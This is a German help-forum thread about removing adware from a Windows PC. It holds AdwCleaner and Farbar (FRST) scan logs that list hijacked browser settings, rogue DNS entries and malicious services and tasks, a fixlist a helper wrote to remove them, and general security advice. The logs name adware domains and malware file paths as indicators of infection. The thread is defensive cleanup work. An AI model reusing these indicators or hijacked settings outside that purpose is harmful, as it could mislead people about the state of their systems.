Daten Gefunden : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\Microsoft\Internet Explorer\SearchScopes [DefaultScope] - {140E657E-89B5-411B-951A-24698B1E79EF}
Schlüssel Gefunden : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\Microsoft\Internet Explorer\SearchScopes\{31E15B1A-A8DD-4EE8-B691-0B5EF63443F3}
Daten Gefunden : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{0384D9E4-6354-47BD-B63F-154E6D937972} [NameServer] - 104.197.191.4
Daten Gefunden : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{96CC4FD2-7AB2-4A4F-B6CB-52F22B8E3A50} [NameServer] - 104.197.191.4
Daten Gefunden : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{97e1de57-d6fa-11e1-be62-806e6f6e6963} [NameServer] - 104.197.191.4
Daten Gefunden : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{C02CAB3E-C922-4371-A1DD-E72CF76EF979} [NameServer] - 104.197.191.4
Daten Gefunden : HKLM\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{0384D9E4-6354-47BD-B63F-154E6D937972} [NameServer] - 104.197.191.4
Daten Gefunden : HKLM\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{96CC4FD2-7AB2-4A4F-B6CB-52F22B8E3A50} [NameServer] - 104.197.191.4
Daten Gefunden : HKLM\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{97e1de57-d6fa-11e1-be62-806e6f6e6963} [NameServer] - 104.197.191.4
Daten Gefunden : HKLM\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{C02CAB3E-C922-4371-A1DD-E72CF76EF979} [NameServer] - 104.197.191.4
Schlüssel Gefunden : HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\terraclicks.com
Schlüssel Gefunden : HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\tradeadexchange.com
Schlüssel Gefunden : HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\www-searching.com
Wert Gefunden : HKCU\Software\Microsoft\Windows\CurrentVersion\Run [Security Utility]
Wert Gefunden : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run [3D BubbleSound]
Wert Gefunden : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run [Sound+]
Wert Gefunden : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run [SpaceSoundPro]
Wert Gefunden : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run [IDSCPRODUCT]
Wert Gefunden : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\Microsoft\Windows\CurrentVersion\Run [Security Utility]
Wert Gefunden : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run [SearchModule]
Wert Gefunden : HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run [Security Utility]
Schlüssel Gefunden : HKLM\SOFTWARE\Classes\DPBHO.DownloadProtect
Schlüssel Gefunden : HKLM\SOFTWARE\Classes\DPBHO.DownloadProtect.1

***** [ Internetbrowser ] *****

[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gefunden : user_pref("browser.newtab.url", "chrome://quick_start/content/index.html");
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gefunden : user_pref("browser.search.defaultenginename", "yessearches");
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gefunden : user_pref("browser.search.defaultenginename.US", "data:text/plain,browser.search.defaultenginename.US=yessearches");
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gefunden : user_pref("browser.search.selectedEngine", "yoursearching");
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gefunden : user_pref("browser.startup.homepage", "search.mpc.am");
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gefunden : user_pref("extensions.mywebsearch.prevKwdEnabled", true);
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gefunden : user_pref("extensions.quick_start.enable_search1", false);
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gefunden : user_pref("extensions.quick_start.sd.closeWindowWithLastTab_prev_state", false);
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gefunden : user_pref("extensions.toolbar.mindspark._brMembers_.BUTTON_STRUCTURE", "[{\"b\":224520315,\"c\":\"mindspark.magnify\",\"p\":\"L.0\"},{\"b\":224520316,\"c\":\"mindspark.entersearchterms\",\"p\":\"L.0.0[...]
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gefunden : user_pref("extensions.toolbar.mindspark._brMembers_.browser.version.last", "43.0");
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gefunden : user_pref("extensions.toolbar.mindspark._brMembers_.firstKnownVersion", "7.38.8.45986");
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gefunden : user_pref("extensions.toolbar.mindspark._brMembers_.homepage", "/index.jhtml?n=7829eb3a");
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gefunden : user_pref("extensions.toolbar.mindspark._brMembers_.hp.enabled", true);
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gefunden : user_pref("extensions.toolbar.mindspark._brMembers_.hp.guardType", "HPR");
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gefunden : user_pref("extensions.toolbar.mindspark._brMembers_.initialized", true);
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gefunden : user_pref("extensions.toolbar.mindspark._brMembers_.installation.installDate", "2016013114");
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gefunden : user_pref("extensions.toolbar.mindspark._brMembers_.installation.success", true);
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gefunden : user_pref("extensions.toolbar.mindspark._brMembers_.lastActivePing", "1454247403235");
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gefunden : user_pref("extensions.toolbar.mindspark._brMembers_.lastKnownVersion", "7.38.8.45986");
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gefunden : user_pref("extensions.toolbar.mindspark._brMembers_.lssState", "{\"previousLocales\":[\"de\",\"en-US\",\"en\"],\"supportedLocales\":[\"de\",\"es\",\"pt\",\"ja\",\"en\"],\"defaultLocale\":\"en\",\"supp[...]
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gefunden : user_pref("extensions.toolbar.mindspark._brMembers_.options.defaultSearch", false);
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gefunden : user_pref("extensions.toolbar.mindspark._brMembers_.options.homePageEnabled", false);
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gefunden : user_pref("extensions.toolbar.mindspark._brMembers_.options.keywordEnabled", true);
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gefunden : user_pref("extensions.toolbar.mindspark._brMembers_.options.tabEnabled", false);
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gefunden : user_pref("extensions.toolbar.mindspark._brMembers_.productDeliveryOption.language", "en");
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gefunden : user_pref("extensions.toolbar.mindspark._brMembers_.productDeliveryOption.type", "Toolbar");
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gefunden : user_pref("extensions.toolbar.mindspark._brMembers_.successUrl", "hxxp://www.yessearches.com/chrome.php?uid=3D1DFE7FACF36BF04423BA9045228492&ptid=sqr1&ts=AHEpB38oBXYsBE..&v=20160121&mode=ffexttoolbar&[...]
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gefunden : user_pref("extensions.toolbar.mindspark._brMembers_.toolbarCollapsed", false);
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gefunden : user_pref("extensions.toolbar.mindspark._brMembers_.uninstallTasks", "{\"prefBranchesToDelete\":[\"extensions.toolbar.mindspark._brMembers_.\"],\"filesToDelete\":[\"C:\\\\Users\\\\Manz\\\\AppData\\\\R[...]
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gefunden : user_pref("extensions.toolbar.mindspark.hp.enabled", true);
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gefunden : user_pref("extensions.toolbar.mindspark.hp.enabled.guid", "yourGSearchfinder@GSearch.com");
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gefunden : user_pref("extensions.toolbar.mindspark.lastInstalled", "yourGSearchfinder@GSearch.com");
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] [Preference] Gefunden : user_pref("keyword.URL", "hxxp://www.yessearches.com/chrome.php?uid=3D1DFE7FACF36BF04423BA9045228492&ptid=sqr1&ts=AHEpB38oBXYsBE..&v=20160121&mode=ffexttoolbar&q=");
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\6kib25c4.default\prefs.js] [Preference] Gefunden : user_pref("browser.newtab.url", "hxxp://www.istartpageing.com/newtab/?type=nt&ts=1454246677&z=dc062b1809293cd4ed326fcg0z2w5z4ofzbq2q8mbq&from=cmi&uid=HitachiXHTS545050A7E380_TA85113VKHP84NKHP84NX");
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\6kib25c4.default\prefs.js] [Preference] Gefunden : user_pref("browser.search.defaultenginename", "istartpageing");
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\6kib25c4.default\prefs.js] [Preference] Gefunden : user_pref("browser.startup.homepage", "hxxp://www.istartpageing.com/?type=hp&ts=1454246677&z=dc062b1809293cd4ed326fcg0z2w5z4ofzbq2q8mbq&from=cmi&uid=HitachiXHTS545050A7E380_TA85113VKHP84NKHP84NX");
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gefunden : user_pref("browser.newtab.url", "chrome://quick_start/content/index.html");
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gefunden : user_pref("browser.search.defaultenginename", "istartpageing");
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gefunden : user_pref("browser.search.defaultenginename.US", "data:text/plain,browser.search.defaultenginename.US=yessearches");
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gefunden : user_pref("browser.search.selectedEngine", "istartpageing");
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gefunden : user_pref("browser.startup.homepage", "hxxp://www.yessearches.com/?ts=AHEpB38oBXYsBE..&v=20160121&uid=3D1DFE7FACF36BF04423BA9045228492&ptid=sqr1&mode=ffseng");
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gefunden : user_pref("extensions.mywebsearch.prevKwdEnabled", true);
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gefunden : user_pref("extensions.quick_start.enable_search1", false);
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gefunden : user_pref("extensions.quick_start.sd.closeWindowWithLastTab_prev_state", false);
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gefunden : user_pref("extensions.toolbar.mindspark._brMembers_.BUTTON_STRUCTURE", "[{\"b\":224520315,\"c\":\"mindspark.magnify\",\"p\":\"L.0\"},{\"b\":224520316,\"c\":\"mindspark.entersearchterms\",\"p\":\"L.0.0[...]
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gefunden : user_pref("extensions.toolbar.mindspark._brMembers_.browser.version.last", "43.0");
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gefunden : user_pref("extensions.toolbar.mindspark._brMembers_.firstKnownVersion", "7.38.8.45986");
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gefunden : user_pref("extensions.toolbar.mindspark._brMembers_.homepage", "/index.jhtml?n=7829eb40");
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gefunden : user_pref("extensions.toolbar.mindspark._brMembers_.hp.enabled", true);
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gefunden : user_pref("extensions.toolbar.mindspark._brMembers_.initialized", true);
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gefunden : user_pref("extensions.toolbar.mindspark._brMembers_.installation.installDate", "2016013120");
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gefunden : user_pref("extensions.toolbar.mindspark._brMembers_.installation.success", true);
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gefunden : user_pref("extensions.toolbar.mindspark._brMembers_.lastActivePing", "1454267863579");
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gefunden : user_pref("extensions.toolbar.mindspark._brMembers_.lastKnownVersion", "7.38.8.45986");
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gefunden : user_pref("extensions.toolbar.mindspark._brMembers_.lssState", "{\"previousLocales\":[\"de\",\"en-US\",\"en\"],\"supportedLocales\":[\"de\",\"es\",\"pt\",\"ja\",\"en\"],\"defaultLocale\":\"en\",\"supp[...]
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gefunden : user_pref("extensions.toolbar.mindspark._brMembers_.options.defaultSearch", false);
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gefunden : user_pref("extensions.toolbar.mindspark._brMembers_.options.homePageEnabled", false);
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gefunden : user_pref("extensions.toolbar.mindspark._brMembers_.options.keywordEnabled", true);
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gefunden : user_pref("extensions.toolbar.mindspark._brMembers_.options.tabEnabled", false);
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gefunden : user_pref("extensions.toolbar.mindspark._brMembers_.productDeliveryOption.language", "en");
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gefunden : user_pref("extensions.toolbar.mindspark._brMembers_.productDeliveryOption.type", "Toolbar");
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gefunden : user_pref("extensions.toolbar.mindspark._brMembers_.successUrl", "hxxp://www.yessearches.com/chrome.php?uid=3D1DFE7FACF36BF04423BA9045228492&ptid=sqr1&ts=AHEpB38oBXYsBE..&v=20160121&mode=ffexttoolbar&[...]
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gefunden : user_pref("extensions.toolbar.mindspark._brMembers_.toolbarCollapsed", false);
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gefunden : user_pref("extensions.toolbar.mindspark._brMembers_.uninstallTasks", "{\"prefBranchesToDelete\":[\"extensions.toolbar.mindspark._brMembers_.\"],\"filesToDelete\":[\"C:\\\\Users\\\\Manz\\\\AppData\\\\R[...]
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gefunden : user_pref("extensions.toolbar.mindspark.hp.enabled", true);
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gefunden : user_pref("extensions.toolbar.mindspark.hp.enabled.guid", "yourGSearchfinder@GSearch.com");
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gefunden : user_pref("extensions.toolbar.mindspark.lastInstalled", "yourGSearchfinder@GSearch.com");
[C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js] [Preference] Gefunden : user_pref("keyword.URL", "hxxp://www.yessearches.com/chrome.php?uid=3D1DFE7FACF36BF04423BA9045228492&ptid=sqr1&ts=AHEpB38oBXYsBE..&v=20160121&mode=ffexttoolbar&q=");
[C:\Users\Manz\AppData\Local\Chromium\User Data\Default\Web data] [Search Provider] Gefunden : palikan
[C:\Users\Manz\AppData\Local\Chromium\User Data\Default\Secure Preferences] [Extension] Gefunden : booedmolknjekdopkepjjeckmjkdpfgl
[C:\Users\Manz\AppData\Local\Chromium\User Data\Default\Secure Preferences] [Extension] Gefunden : flpcjncodpafbgdpnkljologafpionhb
[C:\Users\Manz\AppData\Local\Chromium\User Data\Default\Secure Preferences] [Extension] Gefunden : jlcgehabolcakkjhgmgpkagpolbjlhfa

########## EOF - C:\AdwCleaner\AdwCleaner[S1].txt - [39556 Bytes] ##########

deeprybka · 09.02.2016, 19:11

Sieht gut aus.

Welche Probleme bestehen noch?

crazyhorse57 · 09.02.2016, 19:36

Wie es aussieht läuft er wieder einwandfrei.
Mit dem Gerät kann wieder gearbeitet werden. Diesen Beitrag hab ich damit geschrieben, die bisherigen habe ich mit einem anderen geschrieben.
Ich werde jetzt noch schauen ob Windows aktuell ist und bei Bedarf Updates installieren.

Nochmals Danke für deine Hilfe.

deeprybka · 10.02.2016, 12:41

Schritt 1

Drücke bitte die

+ R Taste und schreibe notepad in das Ausführen Fenster.
Klicke auf OK und kopiere nun den Text aus der Codebox in das leere Textdokument:

Code:

ATTFilter

CloseProcesses:
FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\FCD01E059CED5F6D5A56ED297FC9FBBCFCD0 [2016-01-31] 
S3 brsrv; C:\Users\Manz\AppData\Local\BrowserAir\47.0.0.4\brsrv.exe [X]
S2 Ofelje; "C:\Users\Manz\AppData\Roaming\IodelBefqo\Uithzaa.exe" -cms [X]
S3 sdfhgdf; system32\DRIVERS\sdfhgdf.sys [X]
Task: {1B2DFC51-4A80-475F-9BD8-32F048149B3C} - \Builder Touch2 -> Keine Datei 
Task: {1BBBD9D7-98F4-49E2-8BDF-E4D56C2F1675} - \Builder Touch -> Keine Datei 
Task: {75FE0009-11AD-45E4-87F0-7FA1441696FF} - \ManzObscenelyAdV2 -> Keine Datei 
Task: {AF603348-4FAB-4919-B73D-66B59E54CBDF} - System32\Tasks\Awiikjuw => C:\PROGRA~1\SHOPPE~1\Zelba.bat
Task: {FD4BD04B-AE55-4A01-A755-4E28A2548E48} - \{0D0B7D47-0F7D-040B-7811-090D050F117E} -> Keine Datei

Speichere dieses bitte als Fixlist.txt in das Verzeichnis ab, in dem sich auch die FRST-Anwendung befindet.

Starte FRST und drücke auf den Entfernen-Button.
Das Tool erstellt eine "Fixlog.txt" -Datei.
Poste mir bitte deren Inhalt.

So wird's gemacht: Entfernen des Ordners "Windows.old" - Windows-Hilfe

Wir haben es geschafft!

Die Logs sehen für mich im Moment sauber aus.

Wenn Du möchtest, kannst Du hier sagen, ob Du mit mir und meiner Hilfe zufrieden warst...

und/oder das Forum mit einer kleinen Spende unterstützen.

Es bleibt mir nur noch, Dir unbeschwertes und sicheres Surfen zu wünschen und dass wir uns hier so bald nicht wiedersehen.

Cleanup:
(Die Reihenfolge ist hier entscheidend)

Falls Defogger verwendet wurde: Erneut starten und auf Re-enable klicken.

Falls Combofix verwendet wurde:
Combofix deinstallieren

Wichtig: Bitte Antivirus-Programm, evtl. vorhandenes Skript-Blocking und Anti-Malware Programme deaktivieren.
Drücke bitte die + R Taste und schreibe Combofix /Uninstall in das Ausführen-Fenster.
Klicke auf OK.
Damit wird Combofix komplett entfernt und der Cache der Systemwiederherstellung geleert.
Nun die eben deaktivierten Programme wieder aktivieren.

Alle Logs gepostet? Dann lade Dir bitte

DelFix herunter.

Schließe alle offenen Programme.
Starte die delfix.exe mit einem Doppelklick.
Setze vor jede Funktion ein Häkchen.
Klicke auf Start.

Hinweis: DelFix entfernt u.a. alle verwendeten Programme, die Quarantäne unserer Scanner, den Java-Cache und löscht sich abschließend selbst.
Starte Deinen Rechner abschließend neu. Sollten jetzt noch Programme aus unserer Bereinigung übrig sein, kannst Du diese bedenkenlos löschen.

Absicherung:
Beim Betriebsystem Windows die automatischen Updates aktivieren. Auch die sicherheitsrelevante Software sollte immer nur in der aktuellsten Version vorliegen:

Browser
Java
Flash-Player
PDF-Reader

Sicherheitslücken (z.B. hier) in deren alten Versionen werden dazu ausgenutzt, um beim einfachen Besuch einer manipulierten Website per "Drive-by" Malware zu installieren.
Ich empfehle z.B. die Verwendung von Mozilla Firefox statt des Internet Explorers. Zudem lassen sich mit dem Firefox auch PDF-Dokumente öffnen.

Aktiviere eine Firewall. Die in Windows integrierte genügt im Normalfall völlig.

Verwende ein Antivirusprogramm mit Echtzeitscanner und stets aktueller Signaturendatenbank.

Meine Kauf-Empfehlung:

Zusätzlich kannst Du Deinen PC regelmäßig mit Malwarebytes Anti-Malware scannen.

Optional:

NoScript verhindert das Ausführen von aktiven Inhalten (Java, JavaScript, Flash,...) für sämtliche Websites. Man kann aber nach dem Prinzip einer Whitelist festlegen, auf welchen Seiten Scripts erlaubt werden sollen.

Malwarebytes Anti Exploit: Schützt die Anwendungen des Computers vor der Ausnutzung bekannter Schwachstellen.

Lade Software von einem sauberen Portal wie

.
Wähle beim Installieren von Software immer die benutzerdefinierte Option und entferne den Haken bei allen optional angebotenen Toolbars oder sonstigen, fürs Programm, irrelevanten Ergänzungen.
Um Adware wieder los zu werden, empfiehlt sich zunächst die Deinstallation sowie die anschließende Resteentfernung mit Adwcleaner .

Abschließend noch ein paar grundsätzliche Bemerkungen:
Ändere regelmäßig Deine wichtigen Online-Passwörter und erstelle regelmäßig Backups Deiner wichtigen Dateien oder des Systems.
Der Nutzen von Registry-Cleanern, Optimizern usw. zur Performancesteigerung ist umstritten. Ich empfehle deshalb, die Finger von der Registry zu lassen und lieber die windowseigene Datenträgerbereinigung zu verwenden.

crazyhorse57 · 11.02.2016, 20:55

Code:

ATTFilter

Entferungsergebnis von Farbar Recovery Scan Tool (x64) Version:27-01-2016
durchgeführt von Manz (2016-02-11 20:39:18) Run:1
Gestartet von E:\
Geladene Profile: Manz & UpdatusUser (Verfügbare Profile: Manz & UpdatusUser & Administrator)
Start-Modus: Normal
==============================================

fixlist Inhalt:
*****************
CloseProcesses:
FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\FCD01E059CED5F6D5A56ED297FC9FBBCFCD0 [2016-01-31] 
S3 brsrv; C:\Users\Manz\AppData\Local\BrowserAir\47.0.0.4\brsrv.exe [X]
S2 Ofelje; "C:\Users\Manz\AppData\Roaming\IodelBefqo\Uithzaa.exe" -cms [X]
S3 sdfhgdf; system32\DRIVERS\sdfhgdf.sys [X]
Task: {1B2DFC51-4A80-475F-9BD8-32F048149B3C} - \Builder Touch2 -> Keine Datei 
Task: {1BBBD9D7-98F4-49E2-8BDF-E4D56C2F1675} - \Builder Touch -> Keine Datei 
Task: {75FE0009-11AD-45E4-87F0-7FA1441696FF} - \ManzObscenelyAdV2 -> Keine Datei 
Task: {AF603348-4FAB-4919-B73D-66B59E54CBDF} - System32\Tasks\Awiikjuw => C:\PROGRA~1\SHOPPE~1\Zelba.bat
Task: {FD4BD04B-AE55-4A01-A755-4E28A2548E48} - \{0D0B7D47-0F7D-040B-7811-090D050F117E} -> Keine Datei
*****************

Prozess erfolgreich geschlossen.
C:\Program Files (x86)\mozilla firefox\FCD01E059CED5F6D5A56ED297FC9FBBCFCD0 => erfolgreich verschoben
brsrv => Dienst erfolgreich entfernt
Ofelje => Dienst erfolgreich entfernt
sdfhgdf => Dienst erfolgreich entfernt
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{1B2DFC51-4A80-475F-9BD8-32F048149B3C}" => Schlüssel erfolgreich entfernt
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1B2DFC51-4A80-475F-9BD8-32F048149B3C}" => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Builder Touch2 => Schlüssel nicht gefunden. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{1BBBD9D7-98F4-49E2-8BDF-E4D56C2F1675}" => Schlüssel erfolgreich entfernt
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1BBBD9D7-98F4-49E2-8BDF-E4D56C2F1675}" => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Builder Touch => Schlüssel nicht gefunden. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{75FE0009-11AD-45E4-87F0-7FA1441696FF}" => Schlüssel erfolgreich entfernt
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{75FE0009-11AD-45E4-87F0-7FA1441696FF}" => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ManzObscenelyAdV2 => Schlüssel nicht gefunden. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{AF603348-4FAB-4919-B73D-66B59E54CBDF}" => Schlüssel erfolgreich entfernt
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{AF603348-4FAB-4919-B73D-66B59E54CBDF}" => Schlüssel erfolgreich entfernt
C:\WINDOWS\System32\Tasks\Awiikjuw => erfolgreich verschoben
